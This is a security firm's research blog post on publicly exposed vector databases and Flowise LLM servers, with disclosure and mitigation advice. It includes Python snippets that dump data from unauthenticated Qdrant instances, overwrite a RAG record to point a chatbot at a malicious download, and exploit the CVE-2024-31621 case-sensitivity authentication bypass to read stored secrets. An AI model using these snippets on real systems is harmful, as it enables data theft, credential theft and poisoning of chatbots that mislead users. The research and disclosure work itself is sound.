Get our research team's analysis of the security of GenAI development services.
These days, AI tools and platforms can help your organization in countless ways. You can use large language models (LLMs) to build a chatbot for your clients or employees, or you can choose from the many MLOps platforms to create your own AI flows that orchestrate LLMs, documents, scraping tools, and databases to increase efficiency and speed innovation.
However, despite the many benefits, these systems also introduce risks, such as sensitive information exposure and leakage of secrets.
Our research team investigated a few of these AI platforms for security issues and potential data leakage and found several vulnerabilities in systems and services that are publicly accessible, meaning anyone with Internet access could exploit them.
In this blog post, we discuss the risks surrounding publicly accessible AI services, specifically two popular types:
- Vector DBs
- LLM tools
We will present actual vulnerabilities that we encountered during our research and outline recommended mitigations to help reduce these risks.
Publicly Exposed Vector Databases
What is a vector database?
A vector database is a system that stores data in the form of vectors and is used in many architectures involving AI models. A vector database indexes and stores embeddings – numerical representations of your data as multi-dimensional vectors – along with each embedding's metadata in human-readable text form. Popular vector DB platforms include Milvus, Qdrant, Chroma, and Weaviate.
These databases are primarily used in retrieval-augmented generation (RAG) architectures, where the LLM relies on external retrieval of relevant data to generate its response. For example, a vector database can contain embeddings of medical data, where the metadata includes the appropriate treatment for each case.
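To make this concrete, here is a minimal sketch of how an application might store embeddings with human-readable metadata and retrieve them for a RAG flow. It uses the open-source qdrant-client library as an example; the collection name, payload fields, and toy vectors are illustrative assumptions, not data from any system we examined.

```python
# Minimal RAG-style storage/retrieval sketch (illustrative only).
# Assumes a local Qdrant instance and the qdrant-client package.
from qdrant_client import QdrantClient
from qdrant_client.models import Distance, VectorParams, PointStruct

client = QdrantClient(url="http://localhost:6333")

# Create a collection that stores 4-dimensional vectors (real embeddings
# typically have hundreds or thousands of dimensions).
client.create_collection(
    collection_name="medical_notes",
    vectors_config=VectorParams(size=4, distance=Distance.COSINE),
)

# Each point pairs an embedding with human-readable metadata (the payload).
client.upsert(
    collection_name="medical_notes",
    points=[
        PointStruct(
            id=1,
            vector=[0.12, 0.87, 0.33, 0.05],
            payload={"condition": "example condition", "treatment": "example treatment"},
        )
    ],
)

# At query time, a RAG application embeds the user's question and pulls
# the most similar payloads to ground the LLM's answer.
hits = client.search(
    collection_name="medical_notes",
    query_vector=[0.10, 0.90, 0.30, 0.07],
    limit=3,
)
for hit in hits:
    print(hit.payload)
```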
Security risks of vector databases
Today, there are many different vector database products. Some are open-source, and extremely easy to set up. These databases can store private and confidential data, like PII, medical information, or private email conversations. Consequently, there are potential security risks, including:
Data leakage
Because these services handle sensitive data, security should be a top concern. However, we found that, in many cases, basic guardrails are missing. For example, we found publicly accessible instances allowing anonymous access, where no permission enforcement is part of the setup and anyone with network access to the server can read all the data (as sketched after this list), including:
- The metadata – which contains human-readable text that might be private
- The embeddings – which, according to recent research, can be inverted to recover part of the input data
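To illustrate how little effort such leakage takes, here is a rough sketch that reads both payload metadata and raw vectors from an exposed, unauthenticated instance over Qdrant's REST API, with no credentials. The host name is a placeholder; other vector databases expose similar interfaces.

```python
# Illustrative sketch: reading data from an exposed, unauthenticated
# Qdrant-style vector database over its REST API (placeholder host).
import requests

BASE = "http://exposed-vector-db.example.com:6333"  # hypothetical target

# List all collections on the server.
collections = requests.get(f"{BASE}/collections").json()
names = [c["name"] for c in collections["result"]["collections"]]

# Dump the first batch of points from each collection, including the
# human-readable payload (metadata) and the raw embedding vectors.
for name in names:
    resp = requests.post(
        f"{BASE}/collections/{name}/points/scroll",
        json={"limit": 10, "with_payload": True, "with_vector": True},
    )
    for point in resp.json()["result"]["points"]:
        print(name, point["payload"])
```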
Data poisoning
In a data poisoning attack, an attacker gains access to the database and modifies or deletes parts of the data, changing the behavior of the AI application that relies on that data. Here are some examples of this attack (a sketch of such a modification follows the list):
- Client chatbot: A chatbot may use a vector database to store information about product software updates. Modifying this data could lead to responses with instructions to download and install malicious files, which may result in malware gaining access to customers’ devices and data.
- Medical consulting chatbot that uses historical patient data: Altering this data can result in wrong and even dangerous medical advice.
- RAG system for summarizing a company's financial data: Deleting data may cause the system to malfunction.
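As a rough sketch of the poisoning scenario, an attacker with network access to an unauthenticated instance could overwrite the metadata of an existing record. The example below uses Qdrant's payload-overwrite endpoint, with a hypothetical host, collection, and record ID.

```python
# Illustrative data poisoning sketch against an exposed, unauthenticated
# Qdrant-style instance (hypothetical host, collection, and point ID).
import requests

BASE = "http://exposed-vector-db.example.com:6333"

# Overwrite the human-readable payload of an existing point, e.g. swapping
# a legitimate download link for a malicious one in a support chatbot's data.
requests.put(
    f"{BASE}/collections/product_docs/points/payload",
    json={
        "payload": {"answer": "Download the update from http://malicious.example.com"},
        "points": [42],
    },
)
```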
Exploitation of security vulnerabilities
When you deploy vector database software on a self-hosted server, an attacker may exploit vulnerabilities in that software to, for example, gain remote code execution or escalate privileges on that server. The risk is even more significant when using outdated software, where vulnerabilities are well known and easily exploited.
If, for example, you accidentally or intentionally misconfigure your server to be publicly accessible or protect it with weak authentication, you are exposed to these risks, with a high likelihood of attackers stealing or poisoning your data. In addition, with some prior knowledge, an attacker could edit just the vector data (not the human-readable metadata), making the attack extremely hard to identify and remediate.
Following are some examples we encountered in the wild where such attacks were possible.
Analysis of unprotected vector databases
During this research, we searched for vector database instances using tools that find publicly accessible devices and services.
For each popular vector database system, we checked whether authentication was required and examined whether it was possible to extract its data.
Our investigation found around 30 servers with evidence of corporate or private data. For example:
- Company private email conversations
- Customer PII and product serial numbers
- Financial records
- Candidate resumes and contact information
Some of the vector databases were susceptible to data poisoning:
- Medical chatbot with patients' information database
- Product documentation and technical data sheets
- Company Q&A data
- Real estate agency property data
In all these cases, no vulnerabilities or special tools were needed to read the data. Most platforms provide a REST API or web UI to read and export the data, and we could also use these interfaces to modify or delete it.
Here's an example of a Weaviate vector database, belonging to a company from the engineering services sector, which contained private email conversations:
In another example, we found an instance of a Qdrant database, belonging to a company in the industrial equipment sector, that contained customers’ personal details and purchase information:
Another Weaviate database, this one from a fashion company, contained documents and media summaries:
Publicly Exposed LLM Tools
No-code LLM automation tools
In addition to researching vector databases, we investigated a low-code LLM flow builder, Flowise. This kind of tool lets you build your own LLM flows, including integrations with data loaders, caches, and databases. You can create an AI agent that uses tools to execute tasks like scheduling appointments or sending REST API requests. Flowise also provides an SDK so developers can embed these flows in other applications, including publicly facing ones.
Security risks of LLM automation tools
Data risks
This type of tool can access all kinds of sensitive data, like private company files, LLM models, application configurations, and prompts. Hence, most of these services should be protected by authentication and authorization mechanisms, to avoid the risks of data leakage and data poisoning.
Credential leakage
In addition to leveraging the built-in capabilities of these tools, users often integrate them with external services, like the OpenAI API, Amazon Bedrock, and even Confluence or GitHub. Leakage of these integrations' credentials can lead to an even bigger risk, as seen in recent data breaches at Microsoft and Lowe's Market.
Is there a way to bypass Flowise security mechanisms?
Similar to the vector database research, we scanned for public instances of Flowise servers. Most of the servers we encountered were password-protected.
However, as often happens with new systems, early versions of the platform contain simple vulnerabilities that are easy to exploit. In this case, we encountered a simple authentication bypass (CVE-2024-31621). To exploit this vulnerability, you only need to call the REST API endpoints with upper-case letters instead of lower-case ones (/API/v1 vs. /api/v1).
An exposed Flowise server returns HTTP 401 (Unauthorized) on any API request:
Here is the same request to the same server and endpoint, with a slight change to the URL, which gave us access to the API without any authentication:
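The sketch below shows how such a check might look. The host is a placeholder, and the chatflows endpoint name is an assumption based on Flowise's public REST API; the point is simply that the same request succeeds once the case of the path changes.

```python
# Illustrative check for the CVE-2024-31621 case-sensitivity auth bypass
# (hypothetical host; endpoint name assumed from Flowise's REST API).
import requests

HOST = "http://exposed-flowise.example.com:3000"

# The properly cased endpoint is protected and should return 401.
protected = requests.get(f"{HOST}/api/v1/chatflows")
print("lower-case path:", protected.status_code)  # expected: 401

# Changing the case of the path segment sidesteps the auth middleware
# on vulnerable versions, so the same data is returned without credentials.
bypassed = requests.get(f"{HOST}/API/v1/chatflows")
print("upper-case path:", bypassed.status_code)   # 200 on vulnerable servers

if bypassed.ok:
    # On affected versions, other endpoints (including stored credentials)
    # can be read the same way.
    print(bypassed.json())
```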
With this knowledge, we checked the Flowise servers we had found earlier, and out of 959 servers, 438 (45%) were vulnerable(!). We could then interact with a vulnerable server's REST API endpoints and retrieve all kinds of information and data, without any permission checks.
In addition, in some older versions of Flowise, all the secrets (passwords, API keys) are stored in plaintext in the configuration. This combination let us easily access all the secrets on any vulnerable server.
Key findings from our LLM tools research
We scanned the data in these servers and found a couple dozen secrets, including:
- OpenAI API keys
- Pinecone (Vector DB SaaS) API keys
- GitHub access tokens
- Database connection URLs containing passwords
In addition, we found all the configurations and LLM prompts of these applications, which could help attackers exploit prompt-related vulnerabilities down the road.
For additional information about exposed secret risks, refer to our white paper on this topic.
Example of a simple extraction of GitHub Tokens and OpenAI API keys from a vulnerable Flowise instance:
Below is another example: a Pinecone API key that we found hardcoded in one of the flow configurations. This key can give access to the data stored in that account.
Disclosure
We contacted many of the companies that owned these publicly exposed servers, and most addressed the risk and blocked access to them.
Conclusion
How to protect yourself
AI is the most talked-about topic in the tech industry today. You need to know which platforms your developers are using and make sure you are protected from the new attack paths these platforms introduce.
Restrict access to AI services
First, prevent unnecessary access to the DBs or services. Employ a strict permissions system and disallow anonymous access. If possible, do not publicly expose these services, and manage access through private networks.
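As a quick sanity check, a sketch like the one below can confirm that a vector database deployment rejects anonymous requests and only answers authenticated clients. It uses qdrant-client as an example; the URL and environment variable name are placeholders for your own deployment.

```python
# Illustrative sanity check: confirm the vector DB rejects anonymous access
# and only serves authenticated clients (qdrant-client as an example).
import os
from qdrant_client import QdrantClient

DB_URL = "https://vector-db.internal.example.com:6333"  # placeholder URL

# Anonymous client: this should fail if authentication is enforced.
try:
    QdrantClient(url=DB_URL).get_collections()
    print("WARNING: anonymous access is allowed - lock this down!")
except Exception:
    print("OK: anonymous access is rejected.")

# Authenticated client: API key supplied via an environment variable.
client = QdrantClient(url=DB_URL, api_key=os.environ["VECTOR_DB_API_KEY"])
print("Authenticated access works:",
      [c.name for c in client.get_collections().collections])
```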
Monitor and log activity
Make sure your AI platforms are monitored and their actions are logged so you can detect data leakage and potential data poisoning. Choose your platforms based on security features, so you can verify the integrity of your data and ensure only authenticated and authorized users can access and alter it.
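One lightweight way to verify data integrity, sketched below as a general idea rather than a feature of any specific platform, is to keep a baseline of content hashes for the records you load and periodically compare the live data against it to spot unexpected changes.

```python
# Illustrative integrity check: hash the human-readable payloads you loaded
# and periodically compare against the live data to detect tampering.
import hashlib
import json

def fingerprint(records: dict[int, dict]) -> dict[int, str]:
    """Map each record ID to a SHA-256 hash of its payload."""
    return {
        rec_id: hashlib.sha256(json.dumps(payload, sort_keys=True).encode()).hexdigest()
        for rec_id, payload in records.items()
    }

# Baseline captured when you loaded the data (stored somewhere trusted).
baseline = fingerprint({1: {"answer": "Download the update from the official site"}})

# Later, re-read the same records from the vector DB and compare.
live = fingerprint({1: {"answer": "Download the update from http://malicious.example.com"}})

for rec_id, digest in baseline.items():
    if live.get(rec_id) != digest:
        print(f"ALERT: record {rec_id} changed since it was loaded - possible poisoning")
```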
Use updated software
All software has vulnerabilities, especially new software. Every AI use case offers many different libraries and tools to choose from, and you want to make sure your engineers use safe ones. You can use code scanning tools to make sure your code and dependencies are free of known CVEs and other vulnerabilities.
Mask sensitive details from your data before using it with an LLM
Make sure to remove clients' PII and other sensitive information from your data. If you need to access this information later, tokenize it and keep the original values in a platform such as a data privacy vault, which keeps this information secure and isolated.
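Here is a very simplified sketch of that idea: detect a few common PII patterns, replace them with opaque tokens before the text is embedded or sent to an LLM, and keep the token-to-value mapping in a separate secure store (represented here by a plain dictionary; a real system would use a data privacy vault).

```python
# Simplified PII-masking sketch: replace emails and phone numbers with tokens
# before embedding or prompting; the token map stands in for a secure vault.
import re
import uuid

token_vault: dict[str, str] = {}  # token -> original value (use a real vault in production)

PII_PATTERNS = [
    re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),   # email addresses
    re.compile(r"\+?\d[\d\s().-]{7,}\d"),     # phone-number-like strings
]

def mask_pii(text: str) -> str:
    """Replace detected PII with opaque tokens, storing originals in the vault."""
    for pattern in PII_PATTERNS:
        for match in pattern.findall(text):
            token = f"<PII:{uuid.uuid4().hex[:8]}>"
            token_vault[token] = match
            text = text.replace(match, token)
    return text

masked = mask_pii("Contact John at john.doe@example.com or +1 555 123 4567.")
print(masked)  # PII replaced by tokens; only masked text reaches the LLM / vector DB
```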
How Legit Security Can Help
The Legit Security application security posture management (ASPM) platform, with its AI-discovery features, can give you complete visibility into the use of LLM models in your code and ensure their reliability. The platform also includes secret scanning for your entire SDLC and additional scanners to help you secure your organization. Learn more about the Legit platform here.